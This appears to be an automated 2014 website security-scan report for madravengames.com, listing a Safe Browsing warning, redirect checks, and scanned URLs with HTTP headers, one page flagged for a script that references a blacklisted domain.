Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=madravengames.com
Result: The website is marked by Google as suspicious; visiting this website may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ww35.btrsh.com
Result:
HTTP/1.1 500 Can't connect to ww35.btrsh.com:80
Content-Type: text/plain
Second query (visit from search engine):
GET / HTTP/1.1
Host: ww35.btrsh.com
Referer: http://www.google.com/search?q=ww35.btrsh.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
Request | Server response | Status |
http://madravengames.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 12 Oct 2014 13:43:27 GMT Location: http://www.madravengames.com/ Server: Apache Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.madravengames.com/xmlrpc.php | clean |
http://www.madravengames.com/ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sun, 12 Oct 2014 13:43:28 GMT Location: http://www.sotdguild.com/ Server: Apache Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.madravengames.com/xmlrpc.php | malicious |
http://www.sotdguild.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 12 Oct 2014 13:43:32 GMT Location: http://sotdguild.com/ Server: Apache Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://sotdguild.com/xmlrpc.php | clean |
http://sotdguild.com/ | 200 OK Content-Length: 58220 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: shop-corp24.com | | |
http://static.wowhead.com/widgets/power.js | 200 OK Content-Length: 33265 Content-Type: application/javascript | clean |
http://madravengames.com/./wowhead/js/armory.js.php | 404 Not Found Content-Length: 104 Content-Type: text/html | clean |
http://madravengames.com/test404page.js | 404 Not Found Content-Length: 104 Content-Type: text/html | clean |
http://twitter.com/javascripts/blogger.js | HTTP/1.1 301 Moved Permanently Date: Sun, 12 Oct 2014 13:43:39 UTC Location: https://twitter.com/javascripts/blogger.js Server: tsa_b Content-Length: 0 Set-Cookie: guest_id=v1%3A141312141932895182; Domain=.twitter.com; Path=/; Expires=Tue, 11-Oct-2016 13:43:39 UTC X-Connection-Hash: fd091c6f997ca66cad53b55fda4eb7d8 | clean |
https://twitter.com/javascripts/blogger.js | 404 Not Found Content-Length: 4311 Content-Type: text/html | clean |
https://abs.twimg.com/errors/404-4f54405af9c0bcdecbe656ca8893f7a9.js | 200 OK Content-Length: 10803 Content-Type: application/javascript | clean |
https://twitter.com/ | 200 OK Content-Length: 55717 Content-Type: text/html | clean |
https://abs.twimg.com/c/swift/en/init.41fdd97e68d79a7a9a7352be7b76341eb87caa31.js | 200 OK Content-Length: 303104 Content-Type: application/javascript | clean |
https://twitter.com/?lang=id | 200 OK Content-Length: 56191 Content-Type: text/html | clean |
https://abs.twimg.com/c/swift/id/init.39a186d42f74a4c5332bc02964f0c677cc71ac35.js | 200 OK Content-Length: 303104 Content-Type: application/javascript | clean |
https://twitter.com/?lang=msa | 200 OK Content-Length: 56368 Content-Type: text/html | clean |
https://abs.twimg.com/c/swift/msa/init.ba313b6edd9be3027a42924204d7f32c7a40284f.js | 200 OK Content-Length: 302426 Content-Type: application/javascript | clean |
https://twitter.com/?lang=cs | 200 OK Content-Length: 56606 Content-Type: text/html | clean |
https://abs.twimg.com/c/swift/cs/init.24ebd30b5cd7103a744f5695d176a0ff3ecd6c70.js | 200 OK Content-Length: 303104 Content-Type: application/javascript | clean |
https://twitter.com/?lang=da | 200 OK Content-Length: 56016 Content-Type: text/html | clean |